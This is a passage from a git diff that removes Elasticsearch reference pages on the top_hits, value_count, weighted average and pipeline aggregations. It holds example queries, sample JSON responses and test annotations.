-parameter instead. - -The `top_hits` aggregator can effectively be used to group result sets by certain fields via a bucket aggregator. -One or more bucket aggregators determines by which properties a result set get sliced into. - -==== Options - -* `from` - The offset from the first result you want to fetch. -* `size` - The maximum number of top matching hits to return per bucket. By default the top three matching hits are returned. -* `sort` - How the top matching hits should be sorted. By default the hits are sorted by the score of the main query. - -==== Supported per hit features - -The top_hits aggregation returns regular search hits, because of this many per hit features can be supported: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -IMPORTANT: If you *only* need `docvalue_fields`, `size`, and `sort` then -<> might be a more efficient choice than the Top Hits Aggregation. - -`top_hits` does not support the <> parameter. Query rescoring -applies only to search hits, not aggregation results. To change the scores used -by aggregations, use a <> or -<> query. - -==== Example - -In the following example we group the sales by type and per type we show the last sale. -For each sale only the date and price fields are being included in the source. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "top_tags": { - "terms": { - "field": "type", - "size": 3 - }, - "aggs": { - "top_sales_hits": { - "top_hits": { - "sort": [ - { - "date": { - "order": "desc" - } - } - ], - "_source": { - "includes": [ "date", "price" ] - }, - "size": 1 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Possible response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "top_tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "hat", - "doc_count": 3, - "top_sales_hits": { - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "sales", - "_type": "_doc", - "_id": "AVnNBmauCQpcRyxw6ChK", - "_source": { - "date": "2015/03/01 00:00:00", - "price": 200 - }, - "sort": [ - 1425168000000 - ], - "_score": null - } - ] - } - } - }, - { - "key": "t-shirt", - "doc_count": 3, - "top_sales_hits": { - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "sales", - "_type": "_doc", - "_id": "AVnNBmauCQpcRyxw6ChL", - "_source": { - "date": "2015/03/01 00:00:00", - "price": 175 - }, - "sort": [ - 1425168000000 - ], - "_score": null - } - ] - } - } - }, - { - "key": "bag", - "doc_count": 1, - "top_sales_hits": { - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": null, - "hits": [ - { - "_index": "sales", - "_type": "_doc", - "_id": "AVnNBmatCQpcRyxw6ChH", - "_source": { - "date": "2015/01/01 00:00:00", - "price": 150 - }, - "sort": [ - 1420070400000 - ], - "_score": null - } - ] - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/AVnNBmauCQpcRyxw6ChK/$body.aggregations.top_tags.buckets.0.top_sales_hits.hits.hits.0._id/] -// TESTRESPONSE[s/AVnNBmauCQpcRyxw6ChL/$body.aggregations.top_tags.buckets.1.top_sales_hits.hits.hits.0._id/] -// TESTRESPONSE[s/AVnNBmatCQpcRyxw6ChH/$body.aggregations.top_tags.buckets.2.top_sales_hits.hits.hits.0._id/] - - -==== Field collapse example - -Field collapsing or result grouping is a feature that logically groups a result set into groups and per group returns -top documents. The ordering of the groups is determined by the relevancy of the first document in a group. In -Elasticsearch this can be implemented via a bucket aggregator that wraps a `top_hits` aggregator as sub-aggregator. - -In the example below we search across crawled webpages. For each webpage we store the body and the domain the webpage -belong to. By defining a `terms` aggregator on the `domain` field we group the result set of webpages by domain. The -`top_hits` aggregator is then defined as sub-aggregator, so that the top matching hits are collected per bucket. - -Also a `max` aggregator is defined which is used by the `terms` aggregator's order feature to return the buckets by -relevancy order of the most relevant document in a bucket. - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "query": { - "match": { - "body": "elections" - } - }, - "aggs": { - "top_sites": { - "terms": { - "field": "domain", - "order": { - "top_hit": "desc" - } - }, - "aggs": { - "top_tags_hits": { - "top_hits": {} - }, - "top_hit" : { - "max": { - "script": { - "source": "_score" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -At the moment the `max` (or `min`) aggregator is needed to make sure the buckets from the `terms` aggregator are -ordered according to the score of the most relevant webpage per domain. Unfortunately the `top_hits` aggregator -can't be used in the `order` option of the `terms` aggregator yet. - -==== top_hits support in a nested or reverse_nested aggregator - -If the `top_hits` aggregator is wrapped in a `nested` or `reverse_nested` aggregator then nested hits are being returned. -Nested hits are in a sense hidden mini documents that are part of regular document where in the mapping a nested field type -has been configured. The `top_hits` aggregator has the ability to un-hide these documents if it is wrapped in a `nested` -or `reverse_nested` aggregator. Read more about nested in the <>. - -If nested type has been configured a single document is actually indexed as multiple Lucene documents and they share -the same id. In order to determine the identity of a nested hit there is more needed than just the id, so that is why -nested hits also include their nested identity. The nested identity is kept under the `_nested` field in the search hit -and includes the array field and the offset in the array field the nested hit belongs to. The offset is zero based. - -Let's see how it works with a real sample. Considering the following mapping: - -[source,console] --------------------------------------------------- -PUT /sales -{ - "mappings": { - "properties": { - "tags": { "type": "keyword" }, - "comments": { <1> - "type": "nested", - "properties": { - "username": { "type": "keyword" }, - "comment": { "type": "text" } - } - } - } - } -} --------------------------------------------------- - -<1> The `comments` is an array that holds nested documents under the `product` object. - -And some documents: - -[source,console] --------------------------------------------------- -PUT /sales/_doc/1?refresh -{ - "tags": [ "car", "auto" ], - "comments": [ - { "username": "baddriver007", "comment": "This car could have better brakes" }, - { "username": "dr_who", "comment": "Where's the autopilot? Can't find it" }, - { "username": "ilovemotorbikes", "comment": "This car has two extra wheels" } - ] -} --------------------------------------------------- -// TEST[continued] - -It's now possible to execute the following `top_hits` aggregation (wrapped in a `nested` aggregation): - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "query": { - "term": { "tags": "car" } - }, - "aggs": { - "by_sale": { - "nested": { - "path": "comments" - }, - "aggs": { - "by_user": { - "terms": { - "field": "comments.username", - "size": 1 - }, - "aggs": { - "by_nested": { - "top_hits": {} - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[s/_search/_search\?filter_path=aggregations.by_sale.by_user.buckets/] - -Top hits response snippet with a nested hit, which resides in the first slot of array field `comments`: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "by_sale": { - "by_user": { - "buckets": [ - { - "key": "baddriver007", - "doc_count": 1, - "by_nested": { - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.3616575, - "hits": [ - { - "_index": "sales", - "_type" : "_doc", - "_id": "1", - "_nested": { - "field": "comments", <1> - "offset": 0 <2> - }, - "_score": 0.3616575, - "_source": { - "comment": "This car could have better brakes", <3> - "username": "baddriver007" - } - } - ] - } - } - } - ... - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -<1> Name of the array field containing the nested hit -<2> Position if the nested hit in the containing array -<3> Source of the nested hit - -If `_source` is requested then just the part of the source of the nested object is returned, not the entire source of the document. -Also stored fields on the *nested* inner object level are accessible via `top_hits` aggregator residing in a `nested` or `reverse_nested` aggregator. - -Only nested hits will have a `_nested` field in the hit, non nested (regular) hits will not have a `_nested` field. - -The information in `_nested` can also be used to parse the original source somewhere else if `_source` isn't enabled. - -If there are multiple levels of nested object types defined in mappings then the `_nested` information can also be hierarchical -in order to express the identity of nested hits that are two layers deep or more. - -In the example below a nested hit resides in the first slot of the field `nested_grand_child_field` which then resides in -the second slow of the `nested_child_field` field: - -[source,js] --------------------------------------------------- -... -"hits": { - "total" : { - "value": 2565, - "relation": "eq" - }, - "max_score": 1, - "hits": [ - { - "_index": "a", - "_type": "b", - "_id": "1", - "_score": 1, - "_nested" : { - "field" : "nested_child_field", - "offset" : 1, - "_nested" : { - "field" : "nested_grand_child_field", - "offset" : 0 - } - } - "_source": ... - }, - ... - ] -} -... --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/aggregations/metrics/valuecount-aggregation.asciidoc b/docs/reference/aggregations/metrics/valuecount-aggregation.asciidoc deleted file mode 100644 index 8895ecae60c..00000000000 --- a/docs/reference/aggregations/metrics/valuecount-aggregation.asciidoc +++ /dev/null @@ -1,142 +0,0 @@ -[[search-aggregations-metrics-valuecount-aggregation]] -=== Value count aggregation -++++ -Value count -++++ - -A `single-value` metrics aggregation that counts the number of values that are extracted from the aggregated documents. -These values can be extracted either from specific fields in the documents, or be generated by a provided script. Typically, -this aggregator will be used in conjunction with other single-value aggregations. For example, when computing the `avg` -one might be interested in the number of values the average is computed over. - -`value_count` does not de-duplicate values, so even if a field has duplicates (or a script generates multiple -identical values for a single document), each value will be counted individually. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs" : { - "types_count" : { "value_count" : { "field" : "type" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "types_count": { - "value": 7 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`types_count` above) also serves as the key by which the aggregation result can be -retrieved from the returned response. - -==== Script - -Counting the values generated by a script: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_count": { - "value_count": { - "script": { - "source": "doc['type'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "types_count": { - "value_count": { - "script": { - "id": "my_script", - "params": { - "field": "type" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -NOTE:: Because `value_count` is designed to work with any field it internally treats all values as simple bytes. -Due to this implementation, if `_value` script variable is used to fetch a value instead of accessing the field -directly (e.g. a "value script"), the field value will be returned as a string instead of it's native format. - -[[search-aggregations-metrics-valuecount-aggregation-histogram-fields]] -==== Histogram fields -When the `value_count` aggregation is computed on <>, the result of the aggregation is the sum of all numbers -in the `counts` array of the histogram. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], - "counts" : [3, 7, 23, 12, 6] <1> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], - "counts" : [8, 17, 8, 7, 6] <1> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs": { - "total_requests": { - "value_count": { "field": "latency_histo" } - } - } -} --------------------------------------------------- - -For each histogram field the `value_count` aggregation will sum all numbers in the `counts` array <1>. -Eventually, it will add all values for all histograms and return the following result: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "total_requests": { - "value": 97 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/weighted-avg-aggregation.asciidoc b/docs/reference/aggregations/metrics/weighted-avg-aggregation.asciidoc deleted file mode 100644 index 6cc02b38dcb..00000000000 --- a/docs/reference/aggregations/metrics/weighted-avg-aggregation.asciidoc +++ /dev/null @@ -1,207 +0,0 @@ -[[search-aggregations-metrics-weight-avg-aggregation]] -=== Weighted avg aggregation -++++ -Weighted avg -++++ - -A `single-value` metrics aggregation that computes the weighted average of numeric values that are extracted from the aggregated documents. -These values can be extracted either from specific numeric fields in the documents. - -When calculating a regular average, each datapoint has an equal "weight" ... it contributes equally to the final value. Weighted averages, -on the other hand, weight each datapoint differently. The amount that each datapoint contributes to the final value is extracted from the -document, or provided by a script. - -As a formula, a weighted average is the `∑(value * weight) / ∑(weight)` - -A regular average can be thought of as a weighted average where every value has an implicit weight of `1`. - -[[weighted-avg-params]] -.`weighted_avg` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`value` | The configuration for the field or script that provides the values |Required | -|`weight` | The configuration for the field or script that provides the weights |Required | -|`format` | The numeric response formatter |Optional | -|`value_type` | A hint about the values for pure scripts or unmapped fields |Optional | -|=== - -The `value` and `weight` objects have per-field specific configuration: - -[[value-params]] -.`value` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`field` | The field that values should be extracted from |Required | -|`missing` | A value to use if the field is missing entirely |Optional | -|`script` | A script which provides the values for the document. This is mutually exclusive with `field` |Optional -|=== - -[[weight-params]] -.`weight` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`field` | The field that weights should be extracted from |Required | -|`missing` | A weight to use if the field is missing entirely |Optional | -|`script` | A script which provides the weights for the document. This is mutually exclusive with `field` |Optional -|=== - - -==== Examples - -If our documents have a `"grade"` field that holds a 0-100 numeric score, and a `"weight"` field which holds an arbitrary numeric weight, -we can calculate the weighted average using: - -[source,console] --------------------------------------------------- -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "field": "grade" - }, - "weight": { - "field": "weight" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -Which yields a response like: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "weighted_grade": { - "value": 70.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - - -While multiple values-per-field are allowed, only one weight is allowed. If the aggregation encounters -a document that has more than one weight (e.g. the weight field is a multi-valued field) it will throw an exception. -If you have this situation, you will need to specify a `script` for the weight field, and use the script -to combine the multiple values into a single value to be used. - -This single weight will be applied independently to each value extracted from the `value` field. - -This example show how a single document with multiple values will be averaged with a single weight: - -[source,console] --------------------------------------------------- -POST /exams/_doc?refresh -{ - "grade": [1, 2, 3], - "weight": 2 -} - -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "field": "grade" - }, - "weight": { - "field": "weight" - } - } - } - } -} --------------------------------------------------- -// TEST - -The three values (`1`, `2`, and `3`) will be included as independent values, all with the weight of `2`: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "weighted_grade": { - "value": 2.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The aggregation returns `2.0` as the result, which matches what we would expect when calculating by hand: -`((1*2) + (2*2) + (3*2)) / (2+2+2) == 2` - -==== Script - -Both the value and the weight can be derived from a script, instead of a field. As a simple example, the following -will add one to the grade and weight in the document using a script: - -[source,console] --------------------------------------------------- -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "script": "doc.grade.value + 1" - }, - "weight": { - "script": "doc.weight.value + 1" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - - -==== Missing values - -The `missing` parameter defines how documents that are missing a value should be treated. -The default behavior is different for `value` and `weight`: - -By default, if the `value` field is missing the document is ignored and the aggregation moves on to the next document. -If the `weight` field is missing, it is assumed to have a weight of `1` (like a normal average). - -Both of these defaults can be overridden with the `missing` parameter: - -[source,console] --------------------------------------------------- -POST /exams/_search -{ - "size": 0, - "aggs": { - "weighted_grade": { - "weighted_avg": { - "value": { - "field": "grade", - "missing": 2 - }, - "weight": { - "field": "weight", - "missing": 3 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - diff --git a/docs/reference/aggregations/pipeline.asciidoc b/docs/reference/aggregations/pipeline.asciidoc deleted file mode 100644 index b24a3080886..00000000000 --- a/docs/reference/aggregations/pipeline.asciidoc +++ /dev/null @@ -1,307 +0,0 @@ -[[search-aggregations-pipeline]] - -== Pipeline aggregations - -Pipeline aggregations work on the outputs produced from other aggregations rather than from document sets, adding -information to the output tree. There are many different types of pipeline aggregation, each computing different information from -other aggregations, but these types can be broken down into two families: - -_Parent_:: - A family of pipeline aggregations that is provided with the output of its parent aggregation and is able - to compute new buckets or new aggregations to add to existing buckets. - -_Sibling_:: - Pipeline aggregations that are provided with the output of a sibling aggregation and are able to compute a - new aggregation which will be at the same level as the sibling aggregation. - -Pipeline aggregations can reference the aggregations they need to perform their computation by using the `buckets_path` -parameter to indicate the paths to the required metrics. The syntax for defining these paths can be found in the -<> section below. - -Pipeline aggregations cannot have sub-aggregations but depending on the type it can reference another pipeline in the `buckets_path` -allowing pipeline aggregations to be chained. For example, you can chain together two derivatives to calculate the second derivative -(i.e. a derivative of a derivative). - -NOTE: Because pipeline aggregations only add to the output, when chaining pipeline aggregations the output of each pipeline aggregation -will be included in the final output. - -[[buckets-path-syntax]] -[discrete] -=== `buckets_path` Syntax - -Most pipeline aggregations require another aggregation as their input. The input aggregation is defined via the `buckets_path` -parameter, which follows a specific format: - -// https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_Form -[source,ebnf] --------------------------------------------------- -AGG_SEPARATOR = `>` ; -METRIC_SEPARATOR = `.` ; -AGG_NAME = ; -METRIC = ; -MULTIBUCKET_KEY = `[]` -PATH = ? (, )* ( , ) ; --------------------------------------------------- - -For example, the path `"my_bucket>my_stats.avg"` will path to the `avg` value in the `"my_stats"` metric, which is -contained in the `"my_bucket"` bucket aggregation. - -Paths are relative from the position of the pipeline aggregation; they are not absolute paths, and the path cannot go back "up" the -aggregation tree. For example, this moving average is embedded inside a date_histogram and refers to a "sibling" -metric `"the_sum"`: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "the_sum": { - "sum": { "field": "lemmings" } <1> - }, - "the_movavg": { - "moving_avg": { "buckets_path": "the_sum" } <2> - } - } - } - } -} --------------------------------------------------- -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> The metric is called `"the_sum"` -<2> The `buckets_path` refers to the metric via a relative path `"the_sum"` - -`buckets_path` is also used for Sibling pipeline aggregations, where the aggregation is "next" to a series of buckets -instead of embedded "inside" them. For example, the `max_bucket` aggregation uses the `buckets_path` to specify -a metric embedded inside a sibling aggregation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "max_monthly_sales": { - "max_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this max_bucket aggregation that we want the maximum value of the `sales` aggregation in the -`sales_per_month` date histogram. - -If a Sibling pipeline agg references a multi-bucket aggregation, such as a `terms` agg, it also has the option to -select specific keys from the multi-bucket. For example, a `bucket_script` could select two specific buckets (via -their bucket keys) to perform the calculation: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sale_type": { - "terms": { - "field": "type" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "hat_vs_bag_ratio": { - "bucket_script": { - "buckets_path": { - "hats": "sale_type['hat']>sales", <1> - "bags": "sale_type['bag']>sales" <1> - }, - "script": "params.hats / params.bags" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` selects the hats and bags buckets (via `['hat']`/`['bag']``) to use in the script specifically, -instead of fetching all the buckets from `sale_type` aggregation - -[discrete] -=== Special Paths - -Instead of pathing to a metric, `buckets_path` can use a special `"_count"` path. This instructs -the pipeline aggregation to use the document count as its input. For example, a moving average can be calculated on the document count of each bucket, instead of a specific metric: - -[source,console] --------------------------------------------------- -POST /_search -{ - "aggs": { - "my_date_histo": { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "day" - }, - "aggs": { - "the_movavg": { - "moving_avg": { "buckets_path": "_count" } <1> - } - } - } - } -} --------------------------------------------------- -// TEST[warning:The moving_avg aggregation has been deprecated in favor of the moving_fn aggregation.] - -<1> By using `_count` instead of a metric name, we can calculate the moving average of document counts in the histogram - -The `buckets_path` can also use `"_bucket_count"` and path to a multi-bucket aggregation to use the number of buckets -returned by that aggregation in the pipeline aggregation instead of a metric. for example a `bucket_selector` can be -used here to filter out buckets which contain no buckets for an inner terms aggregation: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "histo": { - "date_histogram": { - "field": "date", - "calendar_interval": "day" - }, - "aggs": { - "categories": { - "terms": { - "field": "category" - } - }, - "min_bucket_selector": { - "bucket_selector": { - "buckets_path": { - "count": "categories._bucket_count" <1> - }, - "script": { - "source": "params.count != 0" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> By using `_bucket_count` instead of a metric name, we can filter out `histo` buckets where they contain no buckets -for the `categories` aggregation - -[[dots-in-agg-names]] -[discrete] -=== Dealing with dots in agg names - -An alternate syntax is supported to cope with aggregations or metrics which -have dots in the name, such as the ++99.9++th -<>. This metric -may be referred to as: - -[source,js] ---------------- -"buckets_path": "my_percentile[99.9]" ---------------- -// NOTCONSOLE - -[[gap-policy]] -[discrete] -=== Dealing with gaps in the data - -Data in the real world is often noisy and sometimes contains *gaps* -- places where data simply doesn't exist. This can -occur for a variety of reasons, the most common being: - -* Documents falling into a bucket do not contain a required field -* There are no documents matching the query for one or more buckets -* The metric being calculated is unable to generate a value, likely because another dependent bucket is missing a value. -Some pipeline aggregations have specific requirements that must be met (e.g. a derivative cannot calculate a metric for the -first value because there is no previous value, HoltWinters moving average need "warmup" data to begin calculating, etc) - -Gap policies are a mechanism to inform the pipeline aggregation about the desired behavior when "gappy" or missing -data is encountered. All pipeline aggregations accept the `gap_policy` parameter. There are currently two gap policies -to choose from: - -_skip_:: - This option treats missing data as if the bucket does not exist. It will skip the bucket and continue - calculating using the next available value. - -_insert_zeros_:: - This option will replace missing values with a zero (`0`) and pipeline aggregation computation will - proceed as normal. - -include::pipeline/avg-bucket-aggregation.asciidoc[] - -include::pipeline/bucket-script-aggregation.asciidoc[] - -include::pipeline/bucket-selector-aggregation.asciidoc[] - -include::pipeline/bucket-sort-aggregation.asciidoc[] - -include::pipeline/cumulative-cardinality-aggregation.asciidoc[] - -include::pipeline/cumulative-sum-aggregation.asciidoc[] - -include::pipeline/derivative-aggregation.asciidoc[] - -include::pipeline/extended-stats-bucket-aggregation.asciidoc[] - -include::pipeline/inference-bucket-aggregation.asciidoc[] - -include::pipeline/max-bucket-aggregation.asciidoc[] - -include::pipeline/min-bucket-aggregation.asciidoc[] - -include::pipeline/movavg-aggregation.asciidoc[] - -include::pipeline/movfn-aggregation.asciidoc[] - -include::pipeline/moving-percentiles-aggregation.asciidoc[] - -include::pipeline/normalize-aggregation.asciidoc[] - -include::pipeline/percentiles-bucket-aggregation.asciidoc[] - -include::pipeline/serial-diff-aggregation.asciidoc[] - -include::pipeline/stats-bucket-aggregation.asciidoc[] - -include::pipeline/sum-bucket-aggregation.asciidoc[] diff --git a/docs/reference/aggregations/pipeline/avg-bucket-aggregation.asciidoc b/docs/reference/aggregations/pipeline/avg-bucket-aggregation.asciidoc deleted file mode 100644 index 27ad8fbbe5e..00000000000 --- a/docs/reference/aggregations/pipeline/avg-bucket-aggregation.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[search-aggregations-pipeline-avg-bucket-aggregation]] -=== Avg bucket aggregation -++++ -Avg bucket -++++ - -A sibling pipeline aggregation which calculates the (mean) average value of a specified metric in a sibling aggregation. -The specified metric must be numeric and the sibling aggregation must be a multi-bucket aggregation. - -[[avg-bucket-agg-syntax]] -==== Syntax - -An `avg_bucket` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "avg_bucket": { - "buckets_path": "the_sum" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[avg-bucket-params]] -.`avg_bucket` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`buckets_path` |The path to the buckets we wish to find the average for (see <> for more - details) |Required | - |`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details) |Optional |`skip` - |`format` |format to apply to the output value of this aggregation |Optional | `null` -|=== - -The following snippet calculates the average of the total monthly `sales`: - -[source,console] --------------------------------------------------- -POST /_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "avg_monthly_sales": { - "avg_bucket": { - "buckets_path": "sales_per_month>sales" <1> - } - } - } -} - --------------------------------------------------- -// TEST[setup:sales] - -<1> `buckets_path` instructs this avg_bucket aggregation that we want the (mean) average value of the `sales` aggregation in the -`sales_per_month` date histogram. - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "avg_monthly_sales": { - "value": 328.33333333333333 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/bucket-script-aggregation.asciidoc b/docs/reference/aggregations/pipeline/bucket-script-aggregation.asciidoc deleted file mode 100644 index 508f0389ca5..00000000000 --- a/docs/reference/aggregations/pipeline/bucket-script-aggregation.asciidoc +++ /dev/null @@ -1,164 +0,0 @@ -[[search-aggregations-pipeline-bucket-script-aggregation]] -=== Bucket script aggregation -++++ -Bucket script -++++ - -A parent pipeline aggregation which executes a script which can perform per bucket computations on specified metrics -in the parent multi-bucket aggregation. The specified metric must be numeric and the script must return a numeric value. - -[[bucket-script-agg-syntax]] -==== Syntax - -A `bucket_script` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "bucket_script": { - "buckets_path": { - "my_var1": "the_sum", <1> - "my_var2": "the_value_count" - }, - "script": "params.my_var1 / params.my_var2" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Here, `my_var1` is the name of the variable for this buckets path to use in the script, `the_sum` is the path to -the metrics to use for that variable. - -[[bucket-script-params]] -.`bucket_script` Parameters -[options="header"] -|=== -|Parameter Name |Description |Required |Default Value -|`script` |The script to run for this aggregation. The script can be inline, file or indexed. (see <> -for more details) |Required | -|`buckets_path` |A map of script variables and their associated path to the buckets we wish to use for the variable -(see <> for more details) |Required | -|`gap_policy` |The policy to apply when gaps are found in the data (see <> for more - details)|Optional |`skip` -|`format` |format to apply to the output value of this aggregation |Optional |`null` -|=== - -The following snippet calculates the ratio percentage of t-shirt sales compared to total sales each month: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "size": 0, - "aggs": { - "sales_per_month": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "total_sales": { - "sum": { - "field": "price" - } - }, - "t-shirts": { - "filter": { - "term": { - "type": "t-shirt" - } - }, - "aggs": { - "sales": { - "sum": { - "field": "price" - } - } - } - }, - "t-shirt-percentage": { - "bucket_script": { - "buckets_path": { - "tShirtSales": "t-shirts>sales", - "totalSales": "total_sales" - }, - "script": "params.tShirtSales / params.totalSales * 100" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "total_sales": { - "value": 550.0 - }, - "t-shirts": { - "doc_count": 1, - "sales": { - "value": 200.0 - } - }, - "t-shirt-percentage": { - "value": 36.36363636363637 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "total_sales": { - "value": 60.0 - }, - "t-shirts": { - "doc_count": 1, - "sales": { - "value": 10.0 - } - }, - "t-shirt-percentage": { - "value": 16.666666666666664 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "total_sales": { - "value": 375.0 - }, - "t-shirts": { - "doc_count": 1, - "sales": { - "value": 175.0 - } - }, - "t-shirt-percentage": { - "value": 46.666666666666664 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/pipeline/bucket-selector-aggregation.asciidoc b/docs/reference/aggregations/pipeline/bucket-selector-aggregation.asciidoc deleted file mode 100644 index 569115e2bfe..00000000000 --- a/docs/reference/aggregations/pipeline/bucket-selector-aggregation.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[[search-aggregations-pipeline-bucket-selector-aggregation]] -=== Bucket selector aggregation -++++ -Bucket selector -++++ - -A parent pipeline aggregation which executes a script which determines whether the current bucket will be retained -in the parent multi-bucket aggregation. The specified metric must be numeric and the script must return a boolean value. -If the script language is `expression` then a numeric return value is permitted. In this case 0.0 will be evaluated as `false` -and all other values will evaluate to true. - -NOTE: The bucket_selector aggregation, like all 